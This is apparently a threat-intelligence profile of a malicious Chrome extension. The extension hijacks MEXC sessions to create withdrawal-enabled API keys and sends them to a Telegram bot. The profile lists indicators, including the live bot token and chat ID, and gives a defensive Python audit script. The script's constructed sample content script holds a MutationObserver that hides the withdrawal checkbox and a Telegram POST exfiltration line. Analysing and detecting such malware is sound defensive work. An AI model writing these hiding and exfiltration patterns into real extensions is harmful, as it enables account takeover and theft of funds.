MEXC API Automator
MEXC API Automator is a malicious Google Chrome extension targeting users of the MEXC cryptocurrency exchange. It masquerades as a tool for automating trading or simplifying MEXC API key management, but is designed to hijack victim accounts and enable theft of funds. The extension was reported by Socket’s Threat Research Team and identified as malware.
The extension is described as a Manifest V3 Chrome extension distributed through the Chrome Web Store, published on September 1, 2025, by the developer alias "jorjortan142." Its extension ID is pppdfgkfdemgfknfnhpkibbkabhghhfh. It injects a content script named script.js into MEXC API management pages matching the pattern *://*.mexc.com/user/openapi* and activates when the victim is already authenticated to MEXC.
Its core behavior is to programmatically create new MEXC API keys inside the victim’s authenticated browser session, select permissions including withdrawals, and then manipulate the MEXC user interface so the withdrawal permission appears disabled even though it remains enabled server-side. Reported UI tampering includes removing the visual checked state from the withdrawal checkbox, hiding the tick mark with injected CSS, and using a MutationObserver to keep the permission visually hidden if the site restores it.
After MEXC displays the newly generated credentials, the extension extracts the Access Key and Secret Key from the page and exfiltrates them via HTTPS POST requests to the Telegram Bot API using a hardcoded bot token and chat ID controlled by the threat actor. Reported exfiltration details include the Telegram endpoint api.telegram.org, bot token 7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I, and chat ID 6526634583.
The attack does not require theft of the user’s password and does not bypass 2FA; instead, it abuses the victim’s existing authenticated session and waits for normal user completion of any required 2FA during API key creation. With the stolen API credentials, the threat actor can gain programmatic control of the victim’s MEXC account, execute trades, and perform automated withdrawals. The risk can persist after the extension is removed because the created API keys remain valid until revoked.
High-confidence attribution in the reporting is limited. Socket reported Russian-language inline comments in the code and assessed with moderate confidence that the operator is a Russian speaker. The activity was also linked in reporting to a broader crypto-focused threat cluster associated with the "SwapSushi" brand and the handle "jorjortan142," but country-level attribution was not established. The malware specifically targets cryptocurrency exchange users, particularly MEXC users managing API keys for bots or automated trading.
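For defenders triaging installed extensions, the following added example (not code from the report or from the extension) audits an unpacked extension's manifest and scripts for the traits described above: the reported extension ID, a content script scoped to MEXC's API management page, a Telegram Bot API reference, and MutationObserver logic touching withdrawal-related DOM state. The sample manifest and script are constructed stand-ins that only mirror those traits.

```python
import json
import re

# Indicators and traits taken from the write-up above.
REPORTED_EXTENSION_ID = "pppdfgkfdemgfknfnhpkibbkabhghhfh"
MEXC_OPENAPI_RE = re.compile(r"mexc\.com/user/openapi")
TELEGRAM_BOT_RE = re.compile(r"api\.telegram\.org/bot")


def audit_extension(ext_id, manifest, scripts):
    """Return a list of findings for one unpacked extension.

    ext_id   -- 32-character extension ID (its folder name under Extensions/)
    manifest -- parsed manifest.json as a dict
    scripts  -- mapping of script filename -> script source text
    """
    findings = []
    if ext_id == REPORTED_EXTENSION_ID:
        findings.append("known-bad extension id")
    for cs in manifest.get("content_scripts", []):
        if any(MEXC_OPENAPI_RE.search(m) for m in cs.get("matches", [])):
            findings.append("content script scoped to MEXC API page: " + ",".join(cs.get("js", [])))
    for name, src in scripts.items():
        if TELEGRAM_BOT_RE.search(src):
            findings.append(f"{name}: Telegram Bot API endpoint referenced")
        if "MutationObserver" in src and "withdraw" in src.lower():
            findings.append(f"{name}: MutationObserver tied to withdrawal-related DOM state")
    return findings


# Constructed sample input (not the real extension's files), shaped like the reported manifest.
SAMPLE_MANIFEST = json.loads("""{
  "manifest_version": 3,
  "name": "MEXC API Automator",
  "content_scripts": [{"matches": ["*://*.mexc.com/user/openapi*"], "js": ["script.js"]}],
  "host_permissions": ["https://api.telegram.org/*"]
}""")
SAMPLE_SCRIPTS = {
    "script.js": "// constructed stand-in\n"
    "const box = document.querySelector('[data-testid=withdraw]');\n"
    "new MutationObserver(() => box.classList.remove('checked')).observe(box, {attributes: true});\n"
    "fetch('https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendMessage', {method: 'POST'});\n"
}

if __name__ == "__main__":
    for finding in audit_extension(REPORTED_EXTENSION_ID, SAMPLE_MANIFEST, SAMPLE_SCRIPTS):
        print("FINDING:", finding)
```

Point it at each folder under the browser profile's Extensions directory, reading manifest.json and the listed content scripts; any finding is a reason to revoke MEXC API keys created while the extension was installed, not just to uninstall it.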
Groups observed using it
1 distinct threat actor attributed by public researchers.
A malicious Chrome extension called MEXC API Automator is abusing trust in browser add-ons to steal cryptocurrency trading access from MEXC users.
Recent activity
4 sources tracked across advisories, community write-ups, and news.
A malicious Chrome extension published on the Chrome Web Store that abuses an authenticated MEXC session to programmatically create new API keys, enable withdrawal permissions while hiding them in the UI, and exfiltrate the API key/secret to a hardcoded Telegram bot so the actor can drain funds.
A malicious Google Chrome extension that targets MEXC users by injecting a content script into the authenticated MEXC API management page, creating new API keys with withdrawal permissions, hiding the withdrawal permission in the UI, and exfiltrating the Access Key/Secret Key to an attacker-controlled Telegram bot. The stolen keys can enable account takeover actions such as trading and withdrawals even after the extension is uninstalled (until keys are revoked).
A Manifest V3 Chrome extension that activates on MEXC’s API management page, silently enables high-privilege API key permissions (including withdrawals) via UI deception, scrapes newly created Access/Secret keys from the DOM, and exfiltrates them to attacker-controlled Telegram infrastructure to enable account takeover and fund theft without stealing passwords.
A malicious Manifest V3 Chrome extension that runs on MEXC’s /user/openapi page to automate creation of new MEXC API keys with trading and withdrawal permissions, deceptively hides the withdrawal permission state in the UI, then steals the access key and secret key from the success modal and exfiltrates them via HTTPS to a hardcoded Telegram Bot API endpoint, enabling account takeover and financial theft via API-based trading and withdrawals.